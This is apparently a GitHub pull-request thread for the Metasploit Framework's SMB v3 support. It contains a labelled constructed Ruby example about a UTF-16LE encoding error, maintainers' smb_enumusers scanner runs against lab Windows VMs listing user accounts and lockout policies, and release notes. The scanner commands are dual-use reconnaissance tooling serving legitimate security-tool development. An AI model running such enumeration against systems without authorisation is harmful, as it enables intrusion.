[1] pry(#<Msf::Modules::Auxiliary__Scanner__Smb__Smb_enum_gpp::MetasploitModule>)> RubySMB::Field::String16.new('’')
Encoding::UndefinedConversionError: "\xE2" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
from /Users/cdelafuente/dev/src/ruby_smb/lib/ruby_smb/field/string16.rb:6:in `encode'
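Added example, not code from the thread or from ruby_smb: it reproduces the String16 failure shown above (a binary-tagged Ruby string holding the UTF-8 bytes of ’) and shows a conversion that relabels valid UTF-8 bytes before transcoding to UTF-16LE. The function names and the sample share name are constructed for illustration.

```ruby
# Constructed example. ruby_smb's String16 field transcodes the assigned
# share or file name to UTF-16LE. Inside msfconsole the option value arrived
# tagged ASCII-8BIT (binary) while holding the UTF-8 bytes "\xE2\x80\x99"
# (U+2019). Ruby refuses to transcode binary bytes above 0x7F, so the
# ASCII-8BIT -> UTF-8 -> UTF-16LE chain raises
# Encoding::UndefinedConversionError, exactly as in the backtrace.

# What a plain String#encode does: no attempt to reinterpret the bytes.
def naive_utf16le(str)
  str.encode(Encoding::UTF_16LE)
end

# Tolerant variant: a binary-tagged input is checked for valid UTF-8 and
# relabelled (force_encoding changes the tag, not the bytes) before the
# transcode. Bytes that are not valid UTF-8 still raise, so corrupted input
# is not silently mangled.
def tolerant_utf16le(str)
  s = str.dup
  if s.encoding == Encoding::BINARY
    candidate = s.force_encoding(Encoding::UTF_8)
    unless candidate.valid_encoding?
      raise Encoding::UndefinedConversionError,
            'binary input is not valid UTF-8; cannot pick an encoding'
    end
    s = candidate
  end
  s.encode(Encoding::UTF_16LE)
end

# Runs one of the converters and reports [:ok, result] or [:error, class].
def attempt_convert(str, converter)
  [:ok, send(converter, str)]
rescue Encoding::UndefinedConversionError => e
  [:error, e.class.name]
end

# Constructed inputs: the share name from the thread as (a) the binary-tagged
# bytes msfconsole handed to the field and (b) the same bytes tagged UTF-8,
# plus a byte sequence that is not UTF-8 at all.
SHARE_BINARY = "Administrator\xE2\x80\x99s Public Folder".b
SHARE_UTF8   = SHARE_BINARY.dup.force_encoding(Encoding::UTF_8)
BAD_BYTES    = "\xFF\xFE".b

if $PROGRAM_NAME == __FILE__
  p attempt_convert(SHARE_BINARY, :naive_utf16le)    # [:error, "Encoding::UndefinedConversionError"]
  p attempt_convert(SHARE_UTF8, :naive_utf16le).first # :ok
  p attempt_convert(SHARE_BINARY, :tolerant_utf16le).first # :ok
  p attempt_convert(BAD_BYTES, :tolerant_utf16le)    # [:error, "Encoding::UndefinedConversionError"]
end
```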

@bwatters-r7

OK..... here are some older OSs for backward compatibility....

msf5 auxiliary(scanner/smb/smb_enumusers) > set smb::protocolversion 1,2,3 
smb::protocolversion => 1,2,3
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.132.0/24:     - Scanned  27 of 256 hosts (10% complete)
[*] 192.168.132.0/24:     - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.132.0/24:     - Scanned  77 of 256 hosts (30% complete)
[+] 192.168.132.103:445   - WIN2K3X86-R2 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.132.104:445   - WIN2K3X86-R2-SP [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.132.0/24:     - Scanned 107 of 256 hosts (41% complete)
[+] 192.168.132.115:445   - WIN2K3X86 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.132.114:445   - WIN2K3X64-SP1 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[+] 192.168.132.116:445   - WIN2K3X86-SP1 [ Administrator, Guest, SUPPORT_388945a0 ] ( LockoutTries=0 PasswordMin=0 )
[*] 192.168.132.0/24:     - Scanned 128 of 256 hosts (50% complete)
[*] 192.168.132.0/24:     - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.132.0/24:     - Scanned 180 of 256 hosts (70% complete)
[*] 192.168.132.0/24:     - Scanned 206 of 256 hosts (80% complete)
[*] 192.168.132.0/24:     - Scanned 232 of 256 hosts (90% complete)
[*] 192.168.132.0/24:     - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

@bwatters-r7

I believe I have it working for Windows XP....

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.132.147:445   - WINXP-SP3 [  ] 
[*] 192.168.132.147:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

Not much info, but the handshake looks good:
[image]

It does not return any users, but neither does the master branch?

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.132.147:445   - WINXP-SP3 [  ] 
[*] 192.168.132.147:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

@bwatters-r7

Windows 2000 SP3 does not appear to work (this is not a regression, as it does the exact same thing on master):

msf5 auxiliary(scanner/smb/smb_enumusers) > run

[*] 192.168.132.196:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

[image]

The password I'm using is correct and I can browse a file share hosted on this VM from a Windows XP VM using the username/password I provided to the scanner.

@smcintyre-r7

It looks like all outstanding issues have been resolved. I updated the Gemfile.lock in commit d3a59dc to incorporate RubySMB 2.0.2, which includes a couple of bug fixes that surfaced from this testing. I also verified that the good ol' MS08-067 is still working.

I'm going to go ahead and merge this into 6.x. Thanks @cdelafuente-r7 for all of your work on this and thanks to everyone who helped test it out!

@smcintyre-r7 smcintyre-r7 merged commit 26cbfa5 into rapid7:6.x Jun 24, 2020
@smcintyre-r7

smcintyre-r7 commented Jun 24, 2020

Release Notes

Added SMB v3 support for client operations to the Metasploit Framework. Modules which already used the new SMB client will now be capable of connecting to servers with all three SMB v3 dialects (3.0, 3.0.2, 3.1.1). In cases where an SMB 3.x dialect is negotiated, the default behavior will be to encrypt the communications to the server (users can disable this by setting SMB::AlwaysEncrypt to false).

Labels: enhancement, msf6 (PRs that need to be landed into the msf 6 branch), rn-enhancement (release notes enhancement), rubysmb